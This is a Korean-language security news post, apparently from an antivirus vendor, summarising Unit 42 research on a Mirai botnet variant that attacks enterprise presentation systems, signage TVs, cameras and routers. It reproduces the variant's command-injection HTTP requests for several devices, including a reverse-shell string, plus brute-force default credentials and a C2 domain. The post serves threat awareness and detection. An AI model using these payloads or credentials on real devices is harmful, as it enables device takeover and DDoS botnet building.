새로운 미라이(Mirai) 변종, 기업 장비들 노려

New Mirai Variant Comes with 27 Exploits, Targets Enterprise Devices

새로운 익스플로잇 11개를 추가한 새로운 미라이 변종이 기업용 WePresent WiPG-1000 무선 프레젠테이션 시스템 및 LG Supersign TV와 같은 인기 있는 장비들을 노리고 있는 것으로 나타났습니다.

지난 9월 Palo Alto Network의 Unit 42가 발표한 보고서에서는 Apache Struts 서버로 타깃을 변경한 미라이 봇넷이 작년 발생한 Equifax 사태에서 사용된 것과 동일함을 발견했으며, SonicWall 방화벽 공격에서 Gafgyt 버전 또한 발견되었습니다. 

이는 기업의 자산을 노리는 더욱 큰 활동으로 볼 수 있습니다.

※ 관련글 보기

▶ Mirai, Gafgyt IoT 봇넷, 기업 부문 노려

연구원들은 이미 패치된 취약점의 익스플로잇이 공격에 사용된 것을 목격했습니다. 이는 공격자들이 Apache Struts의 CVE-2017-5638와 같은 심각한 보안 결점이 존재하는 패치되지 않은 기기를 해킹함으로써 작업을 용이하게 하려는 의도인 것으로 보여집니다.

미라이의 기업용 장비 공격 증가 추세

연구원들은 2019년 1월 발견된 미라이의 일반적인 타깃은 라우터, 네트워크 비디오 카메라, 모뎀 라우터, 무선 컨트롤러이었습니다.

그러나 이젠 기업에서 사용하는 WePresent WiPG-1000 무선 프레젠테이션 시스템 및 LG Supersign TV의 취약점을 악용하고 스캔한다는 것을 발견했습니다.

또한 신규 추가된 익스플로잇 11개가 공격에 사용되어, 미라이가 사용하는 총 익스플로잇의 수는 27개가 되었습니다. 

연구원들은 이 봇넷의 악성 페이로드가 전자 보안, 통합 및 경보 모니터링 서비스를 제공하는 콜롬비아의 회사에서 호스팅되고 있는 것을 발견했습니다.

이 새로운 기능들은 봇넷의 공격 방식을 넓혀주는데 특히, 기업 링크를 공격한다면 DDoS 공격에 사용되는 봇넷의 화력을 더욱 높여줍니다.

Vulnerability	Affected Devices
CVE-2018-17173	LG Supersign TVs
	GET /qsrserver/device/getThumbnail?sourceUri=”+-;rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f+|+/bin/sh+-i+2  >&1+|+;%s+supersign_p%d; >/tmp/f   ;&targetUri=/tmp/thumb/test.jpg&mediaType=image&targetWidth=400&targetHeight  =400&scaleType=crop&=1537275717150 HTTP/1.1  User-Agent: Hello, world  Host: [IP]:[Port]  Connection: keep-alive
WePresent WiPG-1000 Command Injection	WePresent WiPG-1000 Wireless Presentation systems
	POST /cgi-bin/rdfs.cgi HTTP/1.1  Host: [IP]:[Port]  Content-Type: application/x-www-form-  Content-Length: 1024 Client=;%s+wepresent_p%d;&Download=submit
DLink DCS-930L Remote Command Execution	DLink DCS-930L Network Video Cameras
	POST /setSystemCommand HTTP/1.1  Host: [IP]:[Port]  Authorization: Basic YWRtaW46  Content-Type: application/x-www-form-urlencoded; charset=UTF-8  Content-Length: 1024  Connection: keep-alive    ReplySuccessPage=docmd.htm&ReplyErrorPage=docmd.htm&SystemCommand=%s+dcs930l_p%d;  &ConfigSystemCommand=Save
DLink diagnostic.php Command Execution	DLink DIR-645, DIR-815 Routers
	POST /diagnostic.php HTTP/1.  Host: [IP]:[Port]  Content-Type: application/x-www-form-urlencoded; charset=UTF-8  Content-Length: 512    act=ping&dst=&+;%s+dlinkdir_p%d;&
Zyxel P660HN Remote Command Execution	Zyxel P660HN-T routers
	POST /cgi-bin/pages/maintenance/logSetting/logSet.asp HTTP/1.1  Host: [IP]:[Port]  Connection: keep-alive  logSetting_H=1&active=1&logMode=LocalAndRemote&serverPort=123&serverIP=1.1.1.1;%s+P660HN-   T_p%d;&#    POST /cgi-bin/ViewLog.asp HTTP/1.1  Host: [IP]:[Port]  Connection: keep-alive  remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=;  %s+P660HN-T_p%d;#&remoteSubmit=Save
CVE-2016-1555	Netgear WG102, WG103, WN604, WNDAP350, WNDAP360, WNAP320, WNAP210,  WNDAP660, WNDAP620 devices
	GET /boardData102.php?writeData=true&reginfo=0&macAddress=+001122334455+-   c+0+;%s+netgear102_p%d;+echo+# HTTP/1.1  Host: [IP]:[Port]  Connection: keep-alive    GET /boardData103.php?writeData=true&reginfo=0&macAddress=+001122334455+-   c+0+;%s+netgear103_p%d;+echo+# HTTP/1.1  Host: [IP]:[Port]  Connection: keep-alive    GET /boardDataNA.php?writeData=true&reginfo=0&macAddress=+001122334455+-   c+0+;%s+netgearNA_p%d;+echo+# HTTP/1.1  Host: [IP]:[Port]  Connection: keep-alive    GET /boardDataWW.php?writeData=true&reginfo=0&macAddress=+001122334455+-   c+0+;%s+netgearWW_p%d;+echo+# HTTP/1.1  Host: [IP]:[Port]  Connection: keep-alive    GET /boardDataJP.php?writeData=true&reginfo=0&macAddress=+001122334455+-   c+0+;%s+netgearJP_p%d;+echo+# HTTP/1.1  Host: [IP]:[Port]  Connection: keep-alive
CVE-2017-6077, CVE-2017-6334	Netgear DGN2200 N300 Wireless ADSL2+ Modem Routers
	POST /ping.cgi HTTP/1.1  Host: [IP]:[Port]  Authorization: Basic YWRtaW46cGFzc3dvcmQ  Referer: http://%s/DIAG_diag.htm  IPAddr1=12&IPAddr2=12&IPAddr3=12&IPAddr4=12&ping=Ping&ping_IPAddr=12.12.12.12;  %s+dgn2200v1_p%d;    POST /dnslookup.cgi HTTP/1.1  Host: [IP]:[Port]  Authorization: Basic YWRtaW46cGFzc3dvcmQ  Referer: http://%s/DIAG_diag.htm  host_name=www.google.com;+%s+dgn2200v2_p%d&lookup=Lookup
Netgear Prosafe Remote Command Execution	Netgear Prosafe WC9500, WC7600, WC7520 Wireless Controllers
	POST /login_handler.php HTTP/1.1  Host: [IP]:[Port]  Content-Type: application/x-www-form-urlencoded   Content-Length: 512  reqMethod=json_cli_reqMethod&json_cli_jsonData=;%s+prosafe_p%d;+echo+ffffffffffffffff

[신규 추가된 Mirai 익스플로잇]

<이미지 출처: https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/>

새로 발견된 미라이 변종은 아래의 기능들을 갖추고 있습니다

- 미라이의 특징인 0xbeafdead 테이블 키 암호화 체계를 사용합니다.

- 이 키를 사용하여 문자열을 복호화할 때, 일반적이지 않은 브루트포스(Brute Force)용 특정 디폴트 인증 정보를 발견했습니다. (admin:huigu309, root:huigu309, CRAFTSPERSON:ALC#FGU, root:videoflow)

- 이는 C2(Command & Control) 통신을 위해 도메인 epicrustserver[.]cf와 포트 23823을 사용합니다.

- 다른 취약한 기기를 찾는 것 이외에도, 새로운 버전의 미라이는 HTTP Flood DDoS 공격을 실행하라는 명령을 수행할 수 있습니다.

HTTP Flood DDoS 공격이란?

HTTP 클라이언트가 HTTP 요청을 위해 응용프로그램이나 서버와 연결을 시도하는데, 이때 공격자는 공격하는 서비스에 대해 더 많은 자원을 할당하도록 서버를 조작하여 정상적으로 서버의 자원을 요청하는 사용자의 접근을 방해하는 DDoS(분산서비스 거부) 공격

Mirai는 라우터, 디지털 비디오 레코더, IP 카메라와 같은 IoT 기기들을 공격해 추후 대규모 DDoS 공격에 사용될 봇넷으로 탈바꿈하도록 설계된 자체 전파(self-propagating) 봇넷입니다.

2016년, 악성 공격자들은 650Gbps 이상의 DDoS 공격이 가능한 수 십만 대의 감염된 기기들로 이루어진 대규모 미라이 봇넷을 광고했습니다.

제작자는 체포되었지만, 여전히 건재하는 미라이

2016년 해킹 포럼에서 미라이 소스 코드가 공개되면서, 그 이후 여러 사이버 공격자들은 공개된 코드를 활용하여 수많은 봇넷을 만들었습니다. 

이들 중 대부분 복잡도는 동일한 수준이었으나 몇몇 개는 새롭고 복잡한 공격 툴을 추가했습니다.

하지만, 제작자인 Jha, White, Norman은 2018년 12월 악성코드를 제작한 죄로 기소되었으며 유죄 판결을 받았습니다.

현재 알약에서는 해당 악성코드에 대해 Backdoor.Linux.Mirai로 탐지중에 있습니다. 

출처:

https://www.bleepingcomputer.com/news/security/new-mirai-variant-comes-with-27-exploits-targets-enterprise-devices/

https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/